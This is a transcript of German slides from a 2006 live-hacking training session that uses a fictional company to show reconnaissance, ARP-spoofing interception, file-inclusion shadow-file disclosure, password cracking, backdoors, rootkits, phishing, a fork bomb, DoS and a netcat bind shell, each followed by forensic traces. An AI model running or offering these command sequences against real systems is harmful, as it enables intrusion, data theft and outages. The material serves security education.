14 = \ r\/\/ 8z / 3u55

Größe: px
Ab Seite anzeigen:

Download "14 = \ r\/\/ 8z / 3u55"

Transkript

1 14 = \ r\/\/ 8z / 3u55 4R u / 9 /\/\4 / 1P _ / \/0 / )473 / 00. 4Pr1l _1\/3-4x0ring /\/\4r71 / 9. \/\/u / dr4/\/\ \/\/u / / 1(9 _ 4Rd.(0/\/\ Martin G. Wundram Zur AGENDA Seite: 1

2 IAF NRW BZ Neuss Arbeitstagung Manipulation von Daten 19. April 2006 Live Hacking Martin G. Wundram Martin G. Wundram Zur AGENDA Seite: 2

3 Agenda I.Begrüßung und Braingym II.Was macht TronicGuard? III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe Internet-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 3

4 Über mich Geschäftsführender Gesellschafter der TronicGuard GmbH 24 Jahre alt Vordiplom Wirtschaftsinformatik Ich freue mich auf die Begegnung mit Ihnen Und bin auch nach dem Vortrag jederzeit erreichbar. Am besten per Mail an: Martin G. Wundram Zur AGENDA Seite: 4

5 Braingym Stefan, Jan, Tim, Iris, Erika und Heide sind im Garten. Plötzlich zieht ein Gewitter auf; es grollt bedrohlich. Die Jungen rennen ins Haus. Doch keine der drei anderen folgt ihnen. Warum nicht? Martin G. Wundram Zur AGENDA Seite: 5

6 Über uns / Braingym Iris, Erika und Heide sind Pflanzen! Komplexe Themen einfach erschließen Bei Unklarheiten jederzeit nachfragen Im gemeinsamen Dialog Antworten erarbeiten Martin G. Wundram Zur AGENDA Seite: 6

7 Martin G. Wundram Zur AGENDA Seite: 7

8 Martin G. Wundram Zur AGENDA Seite: 8

9 Thinkgeek.com: Internet urinal Martin G. Wundram Zur AGENDA Seite: 9

10 Über die Präsentation Überblick: - Gewinnung von Informationen über Netzwerke - Netzwerküberwachung mit Linux - Konzeptionelle und konkrete Sicherheitslücken ausnutzen - Angreifen von innen und von aussen Die Themen können nur eine Anregung geben Thema uninteressant? Überspringen! Martin G. Wundram Zur AGENDA Seite: 10

11 Agenda III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect Internet-Angriffe 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 11

12 Was macht TronicGuard? Internet Service Provider IT-Infrastruktur: Firewalls, File-Server, Backup-Server,... Webentwicklung, Content Management Systeme Training Sachverständigentätigkeit im Bereich Unix-Systeme Support für FreeBSD und OpenBSD Martin G. Wundram Zur AGENDA Seite: 12

13 Fallbeschreibung: Deutsche-Top-Technologie GmbH Wer wir sind (Ihre fiktive Rolle im Unternehmen): Seit kurzem Projektleiter in der Kreativ-Abteilung (Aussenstelle) der DTT GmbH. Was die DTT GmbH macht: Technologieunternehmen, betreibt Grundlagenforschung im Sanitärbereich ->Fantasieunternehmen! Martin G. Wundram Zur AGENDA Seite: 13

14 Fallbeschreibung: Deutsche-Top-Technologie GmbH Was wir machen: Mit 12 Mitarbeitern neue Geschäftsideen entwickeln. Ein Administrator betreut die vorhandenen Computer. Unsere Idee: Das wertvolle Know-How der Firma stehlen und gewinnbringend an die Konkurrenz verkaufen. Martin G. Wundram Zur AGENDA Seite: 14

15 Fallbeschreibung: Deutsche-Top-Technologie GmbH Das wissen wir: Permanter Internetzugang Alles Wichtige in der Datenbank unserer Aussenstelle Der Inhalt wichtiger s wird mit einem speziellen Programm verschlüsselt, wenn wertvolle Geschäftsgeheimnisse an die Zentrale gesendet werden Unser PC startet Windows XP Helix o.ä. haben wir mitgebracht Martin G. Wundram Zur AGENDA Seite: 15

16 Das Netzwerk ausspähen??????????????? Wo sind wir? Wer sind wir? Gibt es Andere, und wer sind die? Was können wir über das Netzwerk und seine angeschlossenen Geräte erfahren? Infrastruktur! Martin G. Wundram Zur AGENDA Seite: 16

17 Das Netzwerk ausspähen z.b. von Windows XP aus: Eigene IP-Adresse, Subnetz-Maske, Standardgateway und DNS-Server notieren (cmd -> ipconfig -> nslookup) Traceroute ins Internet um weitere Gateways und Router hinter dem Default-Gateway zu finden (cmd -> tracert <host>) Einstellungen im Browser auf Proxy-Konfiguration prüfen Wichtig: Den eigenen Computer auf DHCP-Adressvergabe stellen! Martin G. Wundram Zur AGENDA Seite: 17

18 Das Netzwerk ausspähen Ist das Netzwerk geswitcht, oder wird ein Hub verwendet? -> Traffic im promiscuous-mode sniffen (tcpdump, urlsnarf, ettercap o.ä. verwenden) HUB? SWITCH? ??? MAC A Ethernet-Frame: MAC A -> MAC D MAC B MAC C MAC D Martin G. Wundram Zur AGENDA Seite: 18

19 Das Netzwerk ausspähen Computer 1 Computer 2 Ethernet-Frame: MAC A -> MAC D TCP/IP-Referenzmodell Martin G. Wundram Zur AGENDA Seite: 19

20 Das Netzwerk ausspähen Encapsulation / Kapselung Martin G. Wundram Zur AGENDA Seite: 20

21 Das Netzwerk ausspähen Promiscuous mode Netzwerkkarten können in den promiscuous mode gesetzt werden Martin G. Wundram Zur AGENDA Seite: 21

22 Das Netzwerk ausspähen UNIXoide Systeme haben eingebaute Hilfen: man <genaues suchwort> apropos <teilwort> Nutzen Sie diese!! tcpdump: Gibt die Header von Paketen eines Netzwerkinterfaces aus. Kann durch Filter konfiguriert werden. Ein Unix-Standardtool. Nutzt das Interface bpf (Berkley Packet Filter). man tcpdump. Martin G. Wundram Zur AGENDA Seite: 22

23 Das Netzwerk ausspähen SWITCH oder HUB? Martin G. Wundram Zur AGENDA Seite: 23

24 Das Netzwerk ausspähen Andere Geräte im Netzwerk finden und deren Dienste und ihr Betriebsystem prüfen: nmap -v -O nmap: Nmap network exploration tool and security scanner. man nmap Bei Systemen, die nicht erkannt werden, telnet, netcat oder nmap -v -sv <host> auf offene Ports zur Informationsgewinnung. Router? Martin G. Wundram Zur AGENDA Seite: 24

25 Das Netzwerk ausspähen WAN / Internet DSL/ISDN-Router, Gateway und Firewall, OpenBSD Switch Fileserver, SuSE Linux Unser Hacker-PC, Helix Interne Datenbank und Webserver, FreeBSD 12 Windows XP Clients (Der Administrator und die übrigen Mitarbeiter) Martin G. Wundram Zur AGENDA Seite: 25

26 Das Netzwerk ausspähen Spuren? Promiscuous-Mode kann erkannt werden (ARP-Tests) Scannen kompletter Subnets kann von NIDS (Network Intrusion Detection System, z.b. snort) bemerkt werden Vollständige Verbindungen auf offene Ports (z.b. mit netcat) hinterlassen Logfile-Einträge: May 14 15:52:37 linuxbox sshd[3820]: Did not receive identification string from Martin G. Wundram Zur AGENDA Seite: 26

27 Angriff 1: s abfangen und Verschlüsselung knacken Beschreibung Wir wissen, dass der Abteilungsleiter Herr Meier in Kürze eine Produktstudie per an die Zentrale senden wird. Daher vergiften wir seinen ARP-Cache und den des Gateways, Können voll-duplex seine Daten mithören und Die abfangen Anschließend: Verschlüsselte knacken Martin G. Wundram Zur AGENDA Seite: 27

28 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen Wie können Daten in einem geswitchen LAN abgehört werden? SWITCH :40:63:ca:b9:42 Sniffer 00:40:63:c1:1c:cc Switches erkennen das Ziel eines Datenpakets anhand der Ziel-MAC (Media Access Control) und stellen es nur diesem Ziel zu: Punkt-zu-Punkt-Verbindung Martin G. Wundram Zur AGENDA Seite: 28

29 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC C Sniffer MAC B Gateway MAC C Gezieltes Manipulieren eines einzelnen Hosts zur Überwachung Martin G. Wundram Zur AGENDA Seite: 29

30 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC B Sniffer MAC B Gateway MAC C Martin G. Wundram Zur AGENDA Seite: 30

31 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen ARP ist ein verbindungsloses Protokoll -Computer speichern gemeldete Einträge (Reply) auch ohne diese vorher angefragt zu haben (Request) -Permanente ARP-Replies an das Opfer(Antwortpake) mit Zuordnung: IP-des-Gateway <-> MAC-des-Sniffers Konsequenz: Daten werden vom Opfer nicht mehr an das Gateway, sondern an den Sniffer gesendet Manipulation lediglich auf Ethernet-Ebene! Martin G. Wundram Zur AGENDA Seite: 31

32 Angriff 1: s abfangen und Verschlüsselung knacken Die abfangen (Von: Helix) IP-Forwarding aktivieren echo 1 > /proc/sys/net/ipv4/ip_forward Herrn Meier's PC vergiften arpspoof -t IP_OPFER IP_GATEWAY Das Gateway vergiften arpspoof -t IP_GATEWAY IP_OPFER Herrn Meier's s abfangen tethereal -V "host IP_OPFER && port 25" tee sniffed.messages Martin G. Wundram Zur AGENDA Seite: 32

33 Angriff 1: s abfangen und Verschlüsselung knacken Die auswerten (Von: Helix oder Windows) Der Inhalt der Mail liegt im Rohformat in sniffed.messages vor Die Mail ist, wie erwartet, verschlüsselt Herr Meier schreibt keine Großbuchstaben und endet alle seine s wie folgt: herr meier deutsche-top-technologie gmbh Knacken Sie die Mail! Martin G. Wundram Zur AGENDA Seite: 33

34 Angriff 1: s abfangen und Verschlüsselung knacken Spuren? Die ARP-Tabelle der vergifteten Hosts ändert sich temporär ARP-Spoofing kann von einem NIDS zum Beispiel mit dem Tool arpwatch erkannt und gemeldet werden Martin G. Wundram Zur AGENDA Seite: 34

35 Angriff 2: DB-Server kompromittieren und DB kopieren Beschreibung Der Datenbankserver der Aussenstelle ist von besonderem Interesse, da in der Datenbank das Know-How der Firma gespeichert ist. Unser Ziel: In den DB-Server eindringen und die DB kopieren. Was wir wissen: Auf dem Datenbankserver läuft ein Webserver. Als Datenbanksystem wird MySQL verwendet. Martin G. Wundram Zur AGENDA Seite: 35

36 Angriff 2: DB-Server kompromittieren und DB kopieren Martin G. Wundram Zur AGENDA Seite: 36

37 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen Das Frontend wurde in PHP programmiert phpinfo.php liefert hier Informationen über den Webserver und die PHP-Umgebung ( phpinfo() ) Einzelne Unterpunkte werden als PHP-Datei mit der Endung.inc im Unterordner inc eingebunden Übergabe der gewünschten Datei per GET in include Beliebige andere Übergaben möglich: Martin G. Wundram Zur AGENDA Seite: 37

38 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen at:!:12551:0:99999:7::: bin:*:8902:0:10000:::: daemon:*:8902:0:10000:::: ftp:*:8902:0:10000:::: games:*:8902:0:10000:::: lp:*:8902:0:10000:::: mail:*:8902:0:10000:::: man:*:8902:0:10000:::: mysql:!:12551:0:99999:7::: news:*:8902:0:10000:::: nobody:*:8902:0:10000:::: ntp:!:12551:0:99999:7::: postfix:!:12551:0:99999:7::: root:fg4re/3vax6aw:12551:0:10000:::: sshd:!:12551:0:99999:7::: uucp:*:8902:0:10000:::: wwwrun:*:8902:0:10000:::: achim:3bxoqijnpf3he:12551:0:99999:7:-1:: difficult:tgf0ouuomo3e6:12552:0:99999:7:-1:: elite:0ep61aoxfplr6:12552:0:99999:7:-1:: hacker:fzchoc7bouzns:12552:0:99999:7:-1:: quark:iwk7ky7u7akp2:12552:0:99999:7:-1:: Der Webserver läuft hier als User root und kann daher jede System- Datei öffnen! Martin G. Wundram Zur AGENDA Seite: 38

39 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Passwörter in Linux in der Vergangenheit per default mit 40Bit DES gehasht: root:fg4re/3vax6aw Die Passwörter mit john ermitteln John läuft unter Linux/Unix und Win32 Wörterbuch-Attacken mit Permutationen Brute-Force-Attacken (alle Kombinationen ausprobieren) Martin G. Wundram Zur AGENDA Seite: 39

40 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Sehr schnelle Wörterbuch- und Brute-Force-Attacken: DES: ~ Passwörter/Sekunde FreeBSD MD5: ~4300 P/s OpenBSD Blowfish: ~256 P/s NT LM DES: ~ P/s (1,7GHz-System, Intel Pentium-M) Hier: Worst-Case-Laufzeiten für DES: a-z, 4 Zeichen: 2,8s a-za-z0-9, 4 Zeichen: 92s a-za-z0-9, 6 Zeichen: 99h a-za-z0-9, 8 Zeichen: 43y Martin G. Wundram Zur AGENDA Seite: 40

41 Angriff 2: DB-Server kompromittieren und DB kopieren Einloggen und die Datenbank kopieren Als Root per SSH einloggen (z.b. mit putty von Windows aus) Die Datenbank in /var/lib/mysql mit tar/gzip komprimieren: tar -czf /var/datenbank.tgz /var/lib/mysql Abschließend die Datenbank kopieren (z.b. mit scp von Linux aus): scp /zielordner_auf_meinem_pc Martin G. Wundram Zur AGENDA Seite: 41

42 Angriff 2: DB-Server kompromittieren und DB kopieren Backdoor installieren Die DB soll regelmäßig kopiert werden, aber: Die Passwörter könnten sich ändern Eventuell wird der Webserver irgendwann sicher konfiguriert Daher: Backdoor installieren! Versteckter Remote-Zugriff als Root ohne Passwort Proofs of Concept: Martin G. Wundram Zur AGENDA Seite: 42

43 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Beispiel (Debian Hack 2003): access_log speichert alle Zugriffe auf den Webserver: less /var/log/httpd-access.log utmp und wtmp speichern alle Logins: last und man wtmp SSH-Logins in /var/log/auth.log Die History-Funktion der Shell (bash) speichert die eingegebenen Befehle: history Martin G. Wundram Zur AGENDA Seite: 43

44 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Die (hier sehr simple) Backdoor erscheint in der Prozess-Liste: ps aux Eintrag für den Start der Backdoor in Startup-Skripten Die atime (Zugriffs-Zeitstempel) wird für alle geöffneten Dateien/Ordner aktualisiert Martin G. Wundram Zur AGENDA Seite: 44

45 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Beschreibung Es bietet sich die Gelegenheit, ungestört direkt an das OpenBSD-Gateway und an den Linux-Fileserver heranzutreten. Harter Reboot, um danach das Root-Passwort neu zu setzen Martin G. Wundram Zur AGENDA Seite: 45

46 Angriff 3: Lokalen Zugriff ausnutzen und Root werden OpenBSD-Gateway lokal Per Reset harten Neustart durchführen Am Boot-Prompt mit der Option boot -s Single-User-Mode starten Mit grep ^root /etc/master.passwd den alten Hash anzeigen und eventuell sichern Die /-Partition mit Schreibrechten re-mounten: mount -o rw / Mit passwd eine neues Passwort vergeben (z.b ) Neustarten Martin G. Wundram Zur AGENDA Seite: 46

47 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Windows XP lokal Per Reset harten Neustart durchführen Mit Linux-LiveCD von CD starten Passwort-Rücksetzer aktivieren Das Admin-Passwort blanken Zugriff jetzt ohne Passwort möglich Alternativ: Bisheriges Passwort durch Neues überschreiben Martin G. Wundram Zur AGENDA Seite: 47

48 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Spuren? Der Neustart wird ebenfalls in wtmp gespeichert: last uptime Das Dateisystem muss geprüft werden (fsck) Unter Umständen zeitintensiv Im schlimmsten Fall: Partition korrupt Zeitstempel und Signatur (MD5) der Passwortdatei ändern sich Martin G. Wundram Zur AGENDA Seite: 48

49 Angriff 4: Kompromittierung eines Windows XP-Systems Beschreibung Wir übernehmen hier die Rolle des ungeliebten Controllers, der ständig die Löhne senken will. Wir haben dass Gefühl, nicht besonders beliebt zu sein... Wir sitzen vor unserem PC mit Windows XP und ein Kollege schickt per Mail einen Link auf die Seite: Da wir auf Sicherheit achten, benutzen wir den Browser Firefox Martin G. Wundram Zur AGENDA Seite: 49

50 Angriff 4: Kompromittierung eines Windows XP-Systems Die Javaskript-Schwachstelle Durch eine Lücke im Firefox können wir per Javaskript eine Batchdatei auf dem Opfer-System anlegen und diese mit den Rechten des angemeldeten Benutzers ausführen. Das Batchfile lädt per FTP eine bösartige Programmdatei und belastendes Bildmaterial herunter und führt die Programmdatei dann aus. Danach werden bis auf die Bilder alle Spuren entfernt. Zusätzlich wird die Hosts-Datei manipuliert Martin G. Wundram Zur AGENDA Seite: 50

51 Angriff 4: Kompromittierung eines Windows XP-Systems Spuren? Der Browser cached die aufgerufene Seite Die DOS-Box ist kurze Zeit zu sehen Die gelöschten Dateien werden nicht überschrieben und könnten daher wiederhergestellt werden Der FTP-Download könnte vom Gateway protokolliert werden Eine lokale Firewall könnte den Vorgang erkennen und sogar unterbinden Die Manipulation der Hosts-Datei ist natürlich leicht zu erkennen Martin G. Wundram Zur AGENDA Seite: 51

52 Angriff 5: Frame-Hijacking Beschreibung Die DTT GmbH wickelt ihr Banking online bei der Sparkasse XY ab (PIN/TAN). Jeden Tag um 10:00 Uhr fragt Herr Meier den Kontostand ab und überweist fällige Rechnungen. Um diese Zeit schicken wir Ihm eine präparierte Mail mit einem verlockenden Link. Mit etwas Glück kann der Content-Frame gegen einen eigenen getauscht werden. Auch bei SSL-Verbindung ohne Warnung. (Betrifft u.a. Internet Explorer und Mozilla bis 1.7.2) Martin G. Wundram Zur AGENDA Seite: 52

53 Angriff 5: Frame-Hijacking Mozilla installieren! Martin G. Wundram Zur AGENDA Seite: 53

54 Angriff 5: Frame-Hijacking Spuren? Es wird eine weitere Website nachgeladen. Diese hinterlässt wie üblich Spuren im Verlauf, Cache, Proxy- Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 54

55 Angriff 6: JavaScript-Injection Beschreibung JavaScript-Injection: In Anlehnung an Angriff 2 wollen wir hier einer anfälligen Webseite bösartigen JavaScript-Code übergeben. Der Browser des Opfers führt diesen Code dann in der Sicherheitszone der betreffenden Website aus. Martin G. Wundram Zur AGENDA Seite: 55

56 Angriff 6: JavaScript-Injection Spuren? Log-entry im Webserver: [09/Sep/2004:20:22: ] "GET /inject/index.php?eingabe=%68%61%6c%6c%6f HTTP/1.1" [...] Wie üblich Spuren im Verlauf, Cache, Proxy-Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 56

57 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Beschreibung Der durch die verdächtigen Aktivitäten der letzten Zeit verunsicherte Systemadministrator verwendet seinen Webmailer mittlerweile nur noch per SSL-geschützter Verbindung. Das Ziel ist, trotz SSL-Verbindung Benutzername und Kennwort des Administrators herauszufinden. ->dnsspoof, webmitm Martin G. Wundram Zur AGENDA Seite: 57

58 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen SSL-Zertifikat Zertifikat ausgestellt für FQDN! Martin G. Wundram Zur AGENDA Seite: 58

59 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 3. DNS-Reply: Opfer 1. Browser: https://www.infininet.de 2. DNS-Query: 4. Browser baut Verbindung auf zu: und zeigt an: https://www.infininet.de Martin G. Wundram Zur AGENDA Seite: 59

60 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 4. DNS-Reply: Opfer 1. Browser: https://www.infininet.de 2. DNS-Query: 5. Browser baut Verbindung auf zu: und zeigt an: https://www.infininet.de Hacker / MITM 3. Spoofed DNS-Reply: Hacker baut eigene SSL-Verbindung auf zu: Transparenter HTTP-Proxy zeigt Opferdaten im Klartext an Martin G. Wundram Zur AGENDA Seite: 60

61 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Hintergrund Auflösung von FQDN --> IP ist Schwachstelle. Durch Manipulation dieser Zuordnung Umbiegen möglich. Zertifikate normalerweise für FQDN's ausgestellt. Manipulation auch z.b. durch geändertes hosts-file möglich. Keine Warnung, wenn das eigene Zertifikat vom Browser als gültig erkannt wird (z.b. Thawte, Verisign,...). Achtung bei Aufruf über IP: https:// Martin G. Wundram Zur AGENDA Seite: 61

62 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen IP-Forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Arpspoof Opfer arpspoof -t Arpspoof Gateway arpspoof -t Datei anlegen host mit eintrag IP-HACKER dnsspoof ( man dnsspoof ) webmitm -dd Zertifikat erstellen (Den Anweisungen folgen) Martin G. Wundram Zur AGENDA Seite: 62

63 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Spuren? Auf dem Client-PC: Unter Umständen keinerlei Spuren. Manipulation direkt im DNS-Server möglich. Evtl. (zwischen)gespeichertes Zertifikat. Auf dem eigentlichen Server: Die IP/Hostname des MITM- Systems statt des Opfer-Hosts. Martin G. Wundram Zur AGENDA Seite: 63

64 Angriff 8: Ebay Account phishen Beschreibung Jetzt wollen wir den privaten Ebay Account des Systemadministrators hacken. Eine vermeintliche E-Bay-Mail, die offensichtlich auf ebay.de verlinkt, in Wirklichkeit aber auf ein gefälschtes Login-Formular auf unserem eigenen Server verweist, wird hier wohl ausreichen... May/ html Martin G. Wundram Zur AGENDA Seite: 64

65 Angriff 9: Webserver hacken und Rootkit installieren Beschreibung Da die Software des Fileservers veraltet ist (SuSE Linux 8.0) haben wir es hier mit einem potentiell einfachen Ziel zu tun. Um an die Daten zu kommen, müssen wir Zugriff auf den Root- Account bekommen. Ein Rootkit sorgt dafür, dass wir auch in Zukunft bequemen Zugriff auf das System haben. Martin G. Wundram Zur AGENDA Seite: 65

66 Angriff 9: Webserver hacken und Rootkit installieren Systemzugriff erlangen Oft werden sehr schlechte Benutzername/Kennwort- Kombinationen wie admin/admin oder admin/1234 vergeben. SSH-Verbindung auf datenbank: ssh Kennwort h4cker und dann./ssh-brute passwords Oder wenn expect auf eigenem System installiert: ftp und ssh-brute und passwords downloaden Martin G. Wundram Zur AGENDA Seite: 66

67 Angriff 9: Webserver hacken und Rootkit installieren Userrechte erhöhen Uname -a -> Kernel Für so einen alten Kernel gibt es etliche local root exploits z.b. oder FTP-Download von Exploit auf dem Opfer-System kompilieren: gcc -o elflbl elflbl.c Exploit ausführen: chmod 755 elflbl; elflbl Martin G. Wundram Zur AGENDA Seite: 67

68 Angriff 9: Webserver hacken und Rootkit installieren Rootkit installieren Damit wir auch in Zukunft Root-Zugriff haben, ohne erneut in das System einbrechen zu müssen, installieren wir jetzt ein Rootkit. Vom Opfer-System FTP auf und Download von dk.tar.gz und inst -> Mit dk.tar.gz testen wir ob bereits ein SucKIT installiert ist -> Mit inst installieren wir ein eigenes SucKIT Martin G. Wundram Zur AGENDA Seite: 68

69 Angriff 9: Webserver hacken und Rootkit installieren Spuren? Datenauswertung des Systems machen! Martin G. Wundram Zur AGENDA Seite: 69

70 Angriff 10: DOS-Angriff gegen den sshd des Webservers Beschreibung Um zu verhindern, dass sich der Administrator während des Angriffs per SSH mit dem Server verbindet, zehren wir einfach alle Slots durch einen simplen DOS auf: 10x: ssh Jetzt nochmal: ssh Auszug aus /etc/ssh/sshd_config: MaxStartups 10 Martin G. Wundram Zur AGENDA Seite: 70

71 Angriff 10: DOS-Angriff gegen den sshd des Webservers Spuren? Reguläre Einträge für ssh-verbindungsversuche die durch einen timeout beendet wurden (LoginGraceTime {z.b. 120} beachten) Martin G. Wundram Zur AGENDA Seite: 71

72 Angriff 11: SSHD mit Passwortlogging Beschreibung: Erweiterte Systemprotokollierung Ein befreundeter Administrator bittet uns, während seines Urlaubs auf den zentralen Uni-Server aufzupassen. Wir nutzen die Gelegenheit um an ein paar Passwörter zu kommen. ssh Kennwort: mwadmin / root-kennwort: Jetzt auf Benutzerverbindungen warten: ssh Sniff-Datei: /root/passwoerter Martin G. Wundram Zur AGENDA Seite: 72

73 Angriff 12: Shell-Bombe Beschreibung Stillstand auf einem Unix-System erzeugen: ssh ulimit :(){ : :& };: Martin G. Wundram Zur AGENDA Seite: 73

74 Angriff 13: DOS gegen aktive Firewall Beschreibung Manche Firewalls ergreifen aktiv Gegenmaßnahmen bei (vermeintlichen) Angriffen Proof of Concept: block in quick on $interface from <sshblock> to any pass in quick on $interface proto tcp from any port > 1023 to $interface2 \ port 22 keep state \ (max-src-conn 10, max-src-conn-rate 5/15, overload <sshblock> flush) Test mit lokaler Firewall Martin G. Wundram Zur AGENDA Seite: 74

75 Angriff 14: IDS lahmlegen Beschreibung (N)IDS (Network) Intrusion Detection Systems versuchen sicherheitsrelevante Vorfälle zu erkennen und u.u. sogar Gegenmaßnahmen durchzuführen Sensoren versorgen diese Systeme mit den nötigen Daten/Datenpaketen Um ungestört und unerkannt im Netz der DTT zu arbeiten, werden wir die Sensoren jetzt ausschalten Martin G. Wundram Zur AGENDA Seite: 75

76 Angriff 14: IDS lahmlegen Proof of Concept tcpdump als Sensor downloaden Kompilieren: gcc -o xtcpdump-bgp-dos xtcpdump-bgp-dos.c Ausführen:./xtcpdump-bgp-dos Lists/securityfocus/bugtraq/ /0448.html Martin G. Wundram Zur AGENDA Seite: 76

77 Angriff 15: Versteckter Datenkanal Beschreibung Der Administrator der DTT hat wegen der vielen Sicherheitsvorfälle in der letzten Zeit direkten Zugriff ins Internet gesperrt. Connectivity jetzt nur noch durch einen HTTP-Proxy Wie können wir doch noch unsere eigenen Netzwerkprotokolle und unsere eigenen Server erreichen?? Martin G. Wundram Zur AGENDA Seite: 77

78 Angriff 15: Versteckter Datenkanal httptunnel Bidirektionale, getunnelte Verbindung in HTTP-Requests Der Client übermittelt einen POST und erhält darauf eine Antwort. An den jeweiligen Strom werden nachfolgende Daten angehängt. Martin G. Wundram Zur AGENDA Seite: 78

79 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 79

80 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 80

81 Angriff 15: Versteckter Datenkanal Httptunnel verwenden Telnet-Server bauen (telnetd nicht in Knoppix-STD enthalten): nc -l -e /bin/bash -p 9100 httptunnel-serverkomponente starten: hts -F localhost: httptunnel-clientkomponente starten: htc -F 23 localhost:80 Ethereal starten: ethereal (Interface lo, nach dem capture: Display-Filter http) Telnet-Verbindung starten : nc localhost 23 Martin G. Wundram Zur AGENDA Seite: 81

82 Angriff 16: TinyPHPForum Beschreibung Googlen: powered tinyphpforum Beispiel1: Beispiel2: Martin G. Wundram Zur AGENDA Seite: 82

83 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 83

84 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 84

85 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 85

86 G e s c h a f f t! V i e l e n D a n k u n d b i s b a l d! Martin G. Wundram Zur AGENDA Seite: 86

IAF NRW BZ Neuss Daten abfangen in IP-basierten Netzen. IAF NRW BZ Neuss. 22. September 2004. Daten abfangen in IP-basierten Netzen

IAF NRW BZ Neuss Daten abfangen in IP-basierten Netzen. IAF NRW BZ Neuss. 22. September 2004. Daten abfangen in IP-basierten Netzen IAF NRW BZ Neuss 22. September 2004 Daten abfangen in IP-basierten Netzen Martin G. Wundram wundram@tronicguard.com Martin G. Wundram Seite: 1 Agenda >> 0 Begrüßung und Braingym I Daten abfangen im Internet

Mehr

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Remote Tools SSH SCP Proxy SFTP Port X11 christina.zeeh@studi.informatik.uni-stuttgart.de Grundlagen IP-Adresse 4x8 = 32 Bit Unterteilung des Adressraumes in Subnetze (Uni: 129.69.0.0/16) 129.69.212.19

Mehr

ITELLIUM Systems & Services GmbH der IT Dienstleister der KarstadtQuelle AG

ITELLIUM Systems & Services GmbH der IT Dienstleister der KarstadtQuelle AG Schutz vor ARP-Spoofing Gereon Rütten und Oliver Stutzke Hamburg, 04.02.2004 ITELLIUM Systems & Services GmbH der IT Dienstleister der KarstadtQuelle AG Agenda Einleitung ARP-Spoofing Erkennung von ARP-Spoofing

Mehr

Remote Tools SFTP. Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools SFTP. Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Proxy Remote Tools SFTP SSH X11 Port SCP christina.zeeh@studi.informatik.uni-stuttgart.de Inhalt Grundlagen SSH Remote-Login auf marvin Datentransfer Graphische Anwendungen Tunnel VPN SSH für Fortgeschrittene

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

